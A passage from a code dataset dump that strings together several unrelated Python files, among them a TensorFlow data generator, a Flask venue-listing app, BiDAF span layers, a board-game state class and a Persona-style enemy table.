generate_all_samples_dict(self, path, labels, folds):\n # generates a dictionary between a person and all the photos of that person\n all_samples = {}\n \n for label in labels:\n all_samples[label] = []\n for fold in folds:\n sample_subject = glob.glob('{}/{}/{}/*'.format(path,fold,label))\n all_samples[label]+=(sample_subject)\n return all_samples\n\n def get_next(self):\n all_samples_names = list(self.all_samples.keys())\n\n labels = {\n 'cancer': [0.0, 1.0],\n 'normal': [1.0, 0.0]\n }\n # labels = {\n # 'cancer': [1.0, 0.0],\n # 'normal': [0.0, 1.0]\n # }\n\n if self.type == 'train':\n num_samples_cancer_used = 0\n num_samples_normal_used = 0\n while True:\n # label = random.choice(all_samples_names) # 'cancer' or 'normal'\n choose_cancer = random.random() > 2.0/3\n if choose_cancer:\n label = 'cancer'\n # augment = False\n else:\n label = 'normal'\n # augment = False\n if label == 'cancer':\n sample = self.all_samples[label][num_samples_cancer_used]\n num_samples_cancer_used += 1\n else:\n sample = self.all_samples[label][num_samples_normal_used]\n num_samples_normal_used += 1\n \n if num_samples_cancer_used == len(self.all_samples['cancer']):\n num_samples_cancer_used = 0\n np.random.shuffle(self.all_samples['cancer'])\n \n if num_samples_normal_used == len(self.all_samples['normal']):\n num_samples_normal_used = 0\n np.random.shuffle(self.all_samples['normal'])\n\n # sample = random.choice(self.all_samples[label])\n yield ({self.sample: sample,\n self.label: labels[label],\n self.augment: False})\n \n elif self.type == 'eval':\n while True:\n for sample in self.all_samples['cancer']:\n yield ({self.sample: sample,\n self.label: labels['cancer'],\n self.augment: False}) \n for sample in self.all_samples['normal']:\n yield ({self.sample: sample,\n self.label: labels['normal'],\n self.augment: False})\n \n else:\n raise ValueError('type must be \"train\" or \"eval\"')\n # while True:\n # label = random.choice(all_samples_names) # 'cancer' or 'normal'\n\n # sample = random.choice(self.all_samples[label])\n\n # yield ({self.sample: sample,\n # self.label: labels[label]})\n# a = Generator()\n# b = a.get_next()\n# print(b)\n","sub_path":"evaluation/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"121378105","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nimport re\nfrom flask import (Flask,\n render_template,\n request,\n Response,\n flash,\n redirect,\n url_for,\n abort,\n jsonify)\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\nimport sys\nfrom flask_migrate import Migrate\nfrom datetime import datetime\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\n# Set Flask configuration\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\napp.config['SQLALCHEMY_ECHO'] = False\n\n# Connect to local postgresql database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgres://postgres@localhost:5432/fyyur'\n\n# Import models\nfrom models import db, Venue, Artist, Show\n\n# Initialize SQLAlchemy with current app\ndb.init_app(app)\n\n# Instantiate migration object\nmigrate = Migrate(app, db)\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n data = []\n cities = []\n venues = db.session.query(Venue).all()\n shows = db.session.query(Show).all()\n for venue in venues:\n current_venue = Venue.query.get(venue.id)\n city = current_venue.city\n if city in cities:\n pass\n else:\n state = current_venue.state\n local_venues_list = []\n all_local_venues = Venue.query.filter_by(city=city).all()\n for local_venue in all_local_venues:\n local_venues_list.append(\n {\n \"id\": local_venue.id,\n \"name\": local_venue.name,\n \"num_upcoming_shows\": Show.query.filter_by(venue_id=local_venue.id).count()\n }\n )\n data.append(\n {\n \"city\": city,\n \"state\": state,\n \"venues\": local_venues_list\n }\n )\n cities.append(city)\n return render_template('pages/venues.html', areas = data)\n\n@app.route('/venues/search', methods = ['POST'])\ndef search_venues():\n search_term = request.get_json()['search_term']\n matches = Venue.query.filter(Venue.name.ilike('%' + search_term + '%')).all()\n match_count = len(matches)\n match_details = []\n for match in matches:\n current_time = datetime.now()\n upcoming_shows = []\n shows = match.shows\n for show in shows:\n show_datetime = datetime.strptime(show.start_time, '%Y-%m-%d %H:%M:%S')\n if show_datetime > current_time:\n upcoming_shows.append(show)\n count_upcoming_shows = len(upcoming_shows)\n match_details.append({\n 'id': match.id,\n 'name': match.name,\n 'num_upcoming_shows': count_upcoming_shows\n })\n response = {\n 'count': match_count,\n 'data': match_details\n }\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/venues/')\ndef show_venue(venue_id):\n # Shows the venue page with the given venue_id\n data = Venue.query.get(venue_id)\n print(data)\n # Split into multiple discrete genres using a delimiter\n genres_concatenated = data.genres\n data.genres = re.split(',', genres_concatenated)\n # Append data on past and upcoming shows\n # shows = Show.query.filter_by(venue_id=venue_id).all()\n num_upcoming_shows = 0\n upcoming_shows = []\n past_shows = []\n current_time = datetime.now()\n for show in data.shows:\n show.artist_image_link = show.artist.image_link\n show.artist_name = show.artist.name\n show_datetime = datetime.strptime(show.start_time, '%Y-%m-%d %H:%M:%S')\n if show_datetime > current_time:\n num_upcoming_shows += 1\n upcoming_shows.append(show)\n elif show_datetime <= current_time:\n past_shows.append(show)\n data.past_shows = past_shows\n data.upcoming_shows = upcoming_shows\n data.upcoming_shows_count = num_upcoming_shows\n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n error = False\n body = {}\n try:\n venue_name = request.get_json()['name']\n venue_city = request.get_json()['city']\n venue_state = request.get_json()['state']\n venue_address = request.get_json()['address']\n venue_phone = request.get_json()['phone']\n venue_genres = request.get_json()['genres']\n venue_facebook_link = request.get_json()['facebook_link']\n new_venue = Venue(name = venue_name, city = venue_city, state = venue_state, address = venue_address, phone = venue_phone, genres = venue_genres, facebook_link = venue_facebook_link)\n # Add new venue record to db\n db.session.add(new_venue)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n flash('Venue ' + venue_name + ' was successfully listed!')\n return render_template('pages/home.html')\n\n@app.route('/venues/', methods=['DELETE'])\ndef delete_venue(venue_id):\n error = False\n body = {}\n try:\n venue_to_delete = Venue.query.get(venue_id)\n # Delete venue\n db.session.delete(venue_to_delete)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash('Sorry, this venue could not be deleted.')\n else:\n flash('Venue was successfully deleted.')\n return render_template('pages/home.html')\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n data = Artist.query.order_by('id').all()\n return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n search_term = request.get_json()['search_term']\n matches = Artist.query.filter(Artist.name.ilike('%' + search_term + '%')).all()\n match_count = len(matches)\n match_details = []\n for match in matches:\n current_time = datetime.now()\n upcoming_shows = []\n shows = match.shows\n for show in shows:\n show_datetime = datetime.strptime(show.start_time, '%Y-%m-%d %H:%M:%S')\n if show_datetime > current_time:\n upcoming_shows.append(show)\n count_upcoming_shows = len(upcoming_shows)\n match_details.append({\n 'id': match.id,\n 'name': match.name,\n 'num_upcoming_shows': count_upcoming_shows\n })\n response = {\n 'count': match_count,\n 'data': match_details\n }\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/artists/')\ndef show_artist(artist_id):\n data = []\n current_artist = Artist.query.get(artist_id)\n # Convert genres to appropriately delimited values in a list\n current_artist_genres_list = re.split(',', current_artist.genres)\n # Initialize count of shows\n num_upcoming_shows = 0\n # Split shows into those in the future versus the past\n upcoming_shows = []\n past_shows = []\n current_time = datetime.now()\n shows = Show.query.filter_by(artist_id=artist_id).all()\n for show in shows:\n show_datetime = datetime.strptime(show.start_time, '%Y-%m-%d %H:%M:%S')\n if show_datetime > current_time:\n num_upcoming_shows += 1\n upcoming_shows.append({\n \"id\": show.id,\n \"artist_id\": show.artist_id,\n \"artist\": show.artist,\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"venue_image_link\": show.venue.image_link,\n \"start_time\": show.start_time\n })\n elif show_datetime <= current_time:\n past_shows.append({\n \"id\": show.id,\n \"artist_id\": show.artist_id,\n \"artist\": show.artist,\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"venue_image_link\": show.venue.image_link,\n \"start_time\": show.start_time\n })\n data.append(\n {\n \"id\": current_artist.id,\n \"name\": current_artist.name,\n \"genres\": current_artist_genres_list,\n \"city\": current_artist.city,\n \"state\": current_artist.state,\n \"phone\": current_artist.phone,\n \"website\": current_artist.website,\n \"facebook_link\": current_artist.facebook_link,\n \"seeking_venue\": current_artist.seeking_venues,\n \"image_link\": current_artist.image_link,\n \"upcoming_shows_count\": num_upcoming_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows\": past_shows\n }\n )\n # Return the first list item rather than a list of multiple artists\n data = data[0]\n return render_template('pages/show_artist.html', artist = data)\n\n# Update Artist\n# ----------------------------------------------------------------\n@app.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n form = ArtistForm()\n artist = Artist.query.get(artist_id)\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n error = False\n body = {}\n try:\n new_artist_name = request.get_json()['name']\n new_artist_city = request.get_json()['city']\n new_artist_state = request.get_json()['state']\n new_artist_phone = request.get_json()['phone']\n new_artist_genres = request.get_json()['genres']\n new_artist_facebook_link = request.get_json()['facebook-link']\n db.session.query(Artist).filter(Artist.id == artist_id).update(\n {\n 'name': new_artist_name,\n 'city': new_artist_city,\n 'state': new_artist_state,\n 'phone': new_artist_phone,\n 'genres': new_artist_genres,\n 'facebook_link': new_artist_facebook_link\n }\n )\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n flash('Something went wrong. Please double-check your submission and try again.')\n abort(400)\n else:\n flash('Artist ' + new_artist_name + ' was successfully updated!')\n return render_template('pages/home.html')\n\n@app.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n form = VenueForm()\n venue = Venue.query.get(venue_id)\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n error = False\n body = {}\n try:\n new_venue_name = request.get_json()['name']\n new_venue_city = request.get_json()['city']\n new_venue_state = request.get_json()['state']\n new_venue_phone = request.get_json()['phone']\n new_venue_genres = request.get_json()['genres']\n new_venue_facebook_link = request.get_json()['facebook-link']\n db.session.query(Venue).filter(Venue.id == venue_id).update(\n {\n 'name': new_venue_name,\n 'city': new_venue_city,\n 'state': new_venue_state,\n 'phone': new_venue_phone,\n 'genres': new_venue_genres,\n 'facebook_link': new_venue_facebook_link\n }\n )\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n flash('Something went wrong. Please double-check your submission and try again.')\n abort(400)\n else:\n flash('Artist ' + new_venue_name + ' was successfully updated!')\n return render_template('pages/home.html')\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n error = False\n body = {}\n try:\n new_artist_name = request.get_json()['name']\n new_artist_city = request.get_json()['city']\n new_artist_state = request.get_json()['state']\n new_artist_phone = request.get_json()['phone']\n new_artist_genres = request.get_json()['genres']\n new_artist_facebook_link = request.get_json()['facebook-link']\n new_artist = Artist(name = new_artist_name, city = new_artist_city, state = new_artist_state, genres = new_artist_genres, facebook_link = new_artist_facebook_link)\n # Add new artist record to db\n db.session.add(new_artist)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n flash('Something went wrong. Please double-check your submission and try again.')\n abort(400)\n else:\n flash('Artist ' + new_artist_name + ' was successfully listed!')\n return render_template('pages/home.html')\n\n@app.route('/artists/', methods=['DELETE'])\ndef delete_artist(artist_id):\n error = False\n body = {}\n try:\n artist_to_delete = Artist.query.get(artist_id)\n # Delete artist\n db.session.delete(artist_to_delete)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash('Sorry, this artist could not be deleted.')\n else:\n flash('Artist was successfully deleted.')\n return render_template('pages/home.html')\n\n\n# Shows\n#----------------------------------------------------------------------------#\n# Displays list of shows at /shows\n@app.route('/shows')\ndef shows():\n shows = Show.query.all()\n data = []\n for show in shows:\n venue = db.session.query(Venue).filter_by(id=show.venue_id).first()\n artist = db.session.query(Artist).filter_by(id=show.artist_id).first()\n data.append(\n {\n \"venue_id\": show.venue_id,\n \"venue_name\": venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time\n }\n )\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # Renders form. Do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # Called to create new shows in the db, upon submitting new show listing form\n error = False\n body = {}\n try:\n show_artist_id = request.get_json()['artist_id']\n show_venue_id = request.get_json()['venue_id']\n show_start_time = request.get_json()['start_time']\n new_show = Show(artist_id = show_artist_id, venue_id = show_venue_id, start_time = show_start_time)\n # Add new artist record to db\n db.session.add(new_show)\n db.session.commit()\n # Return response object\n body['artist_id'] = show_artist_id\n body['venue_id'] = show_venue_id\n body['start_time'] = show_start_time\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash('Something went wrong. Please double-check your submission and try again.')\n else:\n flash('Show was successfully listed!')\n return render_template('pages/home.html', error=error)\n\n#----------------------------------------------------------------------------#\n# Error handlers\n#----------------------------------------------------------------------------#\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","sub_path":"projects/01_fyyur/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343384483","text":"import tensorflow as tf\n\nclass SpanBegin(tf.keras.layers.Layer):\n\n def build(self, input_shape):\n last_dim = input_shape[0][-1] + input_shape[1][-1]\n inn_shape_dense1 = input_shape[0][:-1] + (last_dim, )\n self.dense1 = tf.keras.layers.Dense(1)\n self.dense1.build(inn_shape_dense1)\n\n super().build(input_shape)\n\n def call(self, inputs):\n merged_ctx, modeled_ctx = inputs\n\n span_begin_inn = tf.concat([merged_ctx, modeled_ctx], axis=-1)\n span_begin_weight = tf.keras.layers.TimeDistributed(self.dense1)(span_begin_inn)\n span_begin_weight = tf.squeeze(span_begin_weight, axis=-1)\n span_begin_prob = tf.keras.activations.softmax(span_begin_weight)\n\n return span_begin_prob\n\n def compute_output_shape(self, input_shape):\n return input_shape[0][:-1]\n\nclass SpanEnd(tf.keras.layers.Layer):\n\n def build(self, input_shape):\n emb_size = input_shape[0][-1] // 2\n inn_shape_bilstm = input_shape[0][:-1] + (emb_size * 14, )\n inn_shape_dense = input_shape[0][:-1] + (emb_size * 10, )\n\n self.bilstm = tf.keras.layers.Bidirectional(\n tf.keras.layers.LSTM(emb_size, return_sequences=True))\n self.bilstm.build(inn_shape_bilstm)\n\n self.dense = tf.keras.layers.Dense(1)\n self.dense.build(inn_shape_dense)\n\n super().build(input_shape)\n\n def call(self, inputs):\n cencode, merged_ctx, modeled_ctx, span_begin_prob = inputs\n\n _span_begin_prob = tf.expand_dims(span_begin_prob, axis=-1)\n weighted_sum = tf.math.reduce_sum(_span_begin_prob * modeled_ctx, axis=-2)\n\n weighted_ctx = tf.expand_dims(weighted_sum, axis=1)\n tile_shape = tf.concat([[1], [cencode.shape[1]], [1]], axis=0)\n weighted_ctx = tf.tile(weighted_ctx, tile_shape)\n m1 = modeled_ctx * weighted_ctx\n\n span_end_repr = tf.concat([merged_ctx, modeled_ctx, weighted_ctx, m1], axis=-1)\n span_end_repr = self.bilstm(span_end_repr)\n span_end_inn = tf.concat([merged_ctx, span_end_repr], axis=-1)\n span_end_weights = tf.keras.layers.TimeDistributed(self.dense)(span_end_inn)\n span_end_prob = tf.keras.activations.softmax(tf.squeeze(span_end_weights, axis=-1))\n\n return span_end_prob\n\n def compute_output_shape(self, input_shape):\n return input_shape[1][:-1]\n\nclass Combine(tf.keras.layers.Layer):\n\n def call(self, inputs):\n return tf.stack(inputs, axis=1)\n","sub_path":"BiDAF_tf2/layers/span.py","file_name":"span.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195063275","text":"\"\"\"\nModule for registering and managing backends.\n\"\"\"\n\nclass BackendManager(object):\n \"\"\"\n Class to manage the various supported backends.\n \"\"\"\n\n def __init__(self):\n self._eager_backends = [ ]\n self._quick_backends = [ ]\n self._all_backends = [ ]\n self._backends_by_type = { }\n self._backends_by_name = { }\n\n def _register_backend(self, b, name, eager, quick):\n \"\"\"\n Register a new backend.\n\n :param b: Backend to register.\n :param name: Name of backend.\n :param eager: Boolean indicating if the backend is eager.\n :param quick: Boolean indicating if the backend is quick.\n \"\"\"\n self._backends_by_name[name] = b\n self._backends_by_type[b.__class__.__name__] = b\n self._all_backends.append(b)\n if eager:\n self._eager_backends.append(b)\n\n if quick:\n self._quick_backends.append(b)\n\n def __getattr__(self, a):\n if a in self._backends_by_name:\n return self._backends_by_name[a]\n else:\n raise AttributeError(a)\n\n def downsize(self):\n \"\"\"\n Calls the downsize method of all the backends currently registered.\n \"\"\"\n for b in self._all_backends:\n b.downsize()\n\nbackends = BackendManager()\n","sub_path":"claripy/backend_manager.py","file_name":"backend_manager.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52661561","text":"fact = [1]\nfor i in range (2,11):\n fact.append(i*fact[i-2])\n\nN = int(1e6)-1\nord = []\nfor i in range(10,1,-1):\n ord.append(N//fact[i-2])\n N%=fact[i-2]\n\nans = []\ndig = [0,1,2,3,4,5,6,7,8,9]\nfor d in ord:\n ans.append(dig.pop(d))\nans.append(dig.pop(0))\n\nstr=\"\"\nfor d in ans:\n str+=\"%d\"%d\nprint(str)","sub_path":"024. Lexicographic permutations.py","file_name":"024. Lexicographic permutations.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"583344566","text":"import game.constants as const\n\nimport numpy as np\n\n\nclass DetectiveState():\n \"\"\"\n Class to hold detectives' state\n \"\"\"\n\n def __init__(self):\n self.detectivepos = [] # position of the acting detective\n self.otherpos = [] # positions of other detectives\n self.detectivecards = [] # resources of acting detective\n self.revealcountdown = 0\n self.gamecountdown = 0\n self.possiblemrx = []\n self.defeated = False\n\n def extractDetState(self, game, idnumber):\n\n det = game.detectives[idnumber]\n self.detectivepos = det.position\n self.otherpos = [d.position for d in game.detectives if not d.id == idnumber]\n\n self.detectivecards = [det.cards['underground'] / 4, det.cards['bus'] / 8, det.cards['taxi'] / 11]\n\n # Reveal countdown\n revealcountdown = -1\n for i in const.MRX_OPEN_TURNS[:-1]:\n revealcountdown = i - len(game.misterx.history)\n if revealcountdown >= 0:\n break\n\n # Wanneer de laatste reveal geweest is,\n # wordt de teller altijd op 4 (= maximale tellerwaarde) gezet\n # zodat de detectives altijd de indruk hebben dat de reveal nog ver weg is\n # en dat ze dus moeten blijven jagen op mister X.\n # 4 wordt als maximum genomen zodanig dat genormaliseerd kan worden.\n if revealcountdown < 0:\n revealcountdown = 4\n\n self.revealcountdown = revealcountdown / 4\n\n self.gamecountdown = (game.turns - len(game.misterx.history)) / game.turns\n\n possiblepos = game.board.possibleMisterXPositions()\n onehotvec = np.zeros(game.board.size)\n for i in possiblepos:\n onehotvec[i - 1] = 1\n self.possiblemrx = onehotvec\n self.defeated = det.defeated\n return self\n\n def display(self):\n print(f'Detective position: {self.detectivepos}\\nDetective cards: {self.detectivecards}\\nOther detectives: {self.otherpos}\\nReveal countdown: {self.revealcountdown}\\nGame countdown: {self.gamecountdown}\\nOne hot possible Mr X: {self.possiblemrx}')\n\n\nclass MrXState():\n\n def __init__(self):\n self.position = []\n self.detectivepos = []\n self.detectivecards = []\n self.revealcountdown = 0\n self.gamecountdown = 0\n self.blackcards = 0\n self.doublemoves = 0\n self.detdefeated = []\n\n def extractMrXState(self, game):\n self.position = game.misterx.position\n self.detectivepos = [det.position for det in game.detectives]\n for det in game.detectives:\n self.detectivecards.extend([det.cards['taxi'] / 11, det.cards['bus'] / 8, det.cards['underground'] / 4])\n\n # Reveal countdown\n revealcountdown = -1\n for i in const.MRX_OPEN_TURNS[:-1]:\n revealcountdown = i - len(game.misterx.history)\n if revealcountdown >= 0:\n break\n\n # Wanneer de laatste reveal geweest is,\n # wordt de teller altijd op 4 (= maximale tellerwaarde) gezet\n # zodat de detectives altijd de indruk hebben dat de reveal nog ver weg is\n # en dat ze dus moeten blijven jagen op mister X.\n # 4 wordt als maximum genomen zodanig dat genormaliseerd kan worden.\n if revealcountdown < 0:\n revealcountdown = 4\n \n self.revealcountdown = revealcountdown / 4\n\n self.gamecountdown = (game.turns - len(game.misterx.history)) / game.turns\n self.blackcards = game.misterx.cards['black']\n self.doublemoves = game.misterx.cards['double']\n self.detdefeated = [det.defeated for det in game.detectives]\n return self\n\n def display(self):\n print(f'MrX position: {self.position}\\nDetective positions: {self.detectivepos}\\nDetective cards: {self.detectivecards}\\nReveal countdown: {self.revealcountdown}\\nGame countdown: {self.gamecountdown}\\nBlack cards: {self.blackcards}\\nDouble moves left: {self.doublemoves}\\nDetectives defeated: {self.detdefeated}')\n","sub_path":"detectivestate.py","file_name":"detectivestate.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"344380928","text":"# Shadow in battle mode\n\nfrom .Enum import *\nfrom .Persona import *\n\nclass Shadow:\n source = None\n player = None\n hp = 0\n sp = 0\n atk = 0\n isKnown = False\n trueName = None\n knockdown = 0\n buffs = None\n\n def __init__(self, player):\n self.player = player\n self.buffs = dict()\n\n# end turn, -1 turns and check for buffs timeout\n def turn(self):\n calc = False\n for s in self.buffs.copy():\n self.buffs[s] -= 1\n if (self.buffs[s] > 0):\n continue\n\n self.player.say(s + ' wears off.')\n del self.buffs[s]\n calc = True\n\n if (calc):\n self.recalc()\n\n\n# recalc all stats\n def recalc(self):\n oldhp = self.hp\n oldsp = self.sp\n\n # copy stats from object\n self.__dict__.update(self.source.__dict__)\n\n # fix old stats\n self.hp = oldhp\n self.sp = oldsp\n self.isKnown = (self.name in self.player.shadowsKnown)\n if (not self.isKnown):\n self.name = \"the shadow\"\n\n # apply buffs and debuffs\n for k in self.buffs.keys():\n skill = SkillList[k]\n skill.apply(self)\n\n\n# reset shadow stats\n def reset(self, o):\n # copy stats from object\n self.source = o\n self.__dict__.update(o.__dict__)\n self.trueName = self.name\n\n # fix stats\n self.knockdown = 0\n self.maxHP = self.hp\n self.maxSP = self.sp\n self.atk = ShadowAtk[self.level]\n self.buffs.clear()\n\n # analyzed or not\n self.isKnown = (self.name in self.player.shadowsKnown)\n if (not self.isKnown):\n self.name = \"the shadow\"\n\n\n######################################\n\nglobal SkillList\n\nShadowAtk = [ 0, 28, 35, 40, 47, 52, 58, 72, 86, 93, 101,\n 114, 120, 126, 133, 140, 146, 153, 160, 166, 200 ]\nShadowCache = dict()\nShadowList = dict()\n\nShadowList['Lying Hablerie'] = PersonaStats(\n name = 'Lying Hablerie',\n arcana = Arcana.Magician,\n floor = (1, 2),\n level = 5,\n hp = 73,\n sp = 51,\n exp = 24,\n yen = 180,\n skills = [],\n affinity = {\n DamageType.Ice: DamageAffinity.Weak,\n DamageType.Elec: DamageAffinity.Weak,\n DamageType.Fire: DamageAffinity.Strong,\n }\n )\n\nShadowList['Calm Pesce'] = PersonaStats(\n name = 'Calm Pesce',\n arcana = Arcana.Priestess,\n floor = (1, 2),\n level = 6,\n hp = 82,\n sp = 23,\n exp = 38,\n yen = 180,\n skills = [],\n affinity = {\n DamageType.Wind: DamageAffinity.Weak,\n DamageType.Phys: DamageAffinity.Strong,\n DamageType.Ice: DamageAffinity.Block,\n }\n )\n\nShadowList['Trance Twins'] = PersonaStats(\n name = 'Trance Twins',\n arcana = Arcana.Hierophant,\n floor = (3, 5),\n level = 7,\n hp = 122,\n sp = 62,\n exp = 61,\n yen = 200,\n # TODO: skill = SkillList['Mabufu'],\n skills = [ SkillList['Bufu'] ],\n affinity = {\n DamageType.Phys: DamageAffinity.Strong,\n DamageType.Wind: DamageAffinity.Block,\n DamageType.Ice: DamageAffinity.Block,\n DamageType.Elec: DamageAffinity.Block,\n }\n )\n\nShadowList['Black Raven'] = PersonaStats(\n name = 'Black Raven',\n arcana = Arcana.Hermit,\n floor = (3, 7),\n level = 7,\n hp = 108,\n sp = 25,\n exp = 57,\n yen = 180,\n # TODO: skill = SkillList['Tarukaja'],\n skills = [],\n affinity = {\n DamageType.Elec: DamageAffinity.Weak,\n DamageType.Wind: DamageAffinity.Block,\n DamageType.Fire: DamageAffinity.Block,\n }\n )\n\nShadowList['Magic Hand'] = PersonaStats(\n name = 'Magic Hand',\n arcana = Arcana.Magician,\n floor = (3, 5),\n level = 8,\n hp = 130,\n sp = 10,\n exp = 77,\n yen = 190,\n skills = [ SkillList['Agi'] ],\n # TODO: skill2 = SkillList['Blue Wall'],\n affinity = {\n DamageType.Ice: DamageAffinity.Weak,\n }\n )\n\n# TODO: actually summoned by Positive King\nShadowList['Secret Bambino'] = PersonaStats(\n name = 'Secret Bambino',\n arcana = Arcana.Empress,\n floor = (4, 7),\n level = 10,\n hp = 122,\n sp = 62,\n exp = 61,\n yen = 200,\n skills = [ SkillList['Bash'] ],\n affinity = {\n DamageType.Elec: DamageAffinity.Weak,\n }\n )\n\n# TODO: special AI\n# It will summon a Secret Bambino and then try to hit party members with Zio. After some turns pass, it will Stand By and then escape the battle. If a Phantom Mage is present in battle, it may instead summon a Bronze Dice shadow.\nShadowList['Positive King'] = PersonaStats(\n name = 'Positive King',\n arcana = Arcana.Emperor,\n floor = (4, 7),\n level = 11,\n hp = 160,\n sp = 43,\n exp = 142,\n yen = 200,\n # TODO: skill = SkillList['Summon Secret Bambino'],\n skills = [],\n affinity = {\n DamageType.Fire: DamageAffinity.Weak,\n DamageType.Phys: DamageAffinity.Strong,\n# DamageType.Elec: DamageAffinity.Reflect,\n }\n )\n\nShadowList['Bronze Dice'] = PersonaStats(\n name = 'Bronze Dice',\n arcana = Arcana.Fortune,\n floor = (4, 7),\n level = 10,\n hp = 130,\n sp = 34,\n exp = 222,\n yen = 200,\n # TODO: skill = SkillList['Last Resort'],\n skills = [],\n affinity = {\n DamageType.Elec: DamageAffinity.Weak,\n DamageType.Phys: DamageAffinity.Strong,\n }\n )\n\n\"\"\"\nShadowList[''] = PersonaStats(\n name = '',\n arcana = Arcana.,\n floor = (),\n level = ,\n hp = ,\n sp = ,\n exp = ,\n yen = ,\n skills = [],\n weak = [],\n strong = [],\n block = [],\n absorb = [],\n reflect = [],\n )\n\"\"\"\n\n# fill shadows cache by level\nfor s in ShadowList:\n shadow = ShadowList[s]\n for i in range(shadow.floor[0], shadow.floor[1] + 1):\n if (not i in ShadowCache):\n ShadowCache[i] = []\n ShadowCache[i].append(shadow)\n\n","sub_path":"igor/Shadow.py","file_name":"Shadow.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"98065108","text":"import torch\nimport os\nfrom torch.utils.data import Dataset, DataLoader\n\nimport numpy as np\nimport torch.nn.functional as nnf\nfrom sklearn.model_selection import 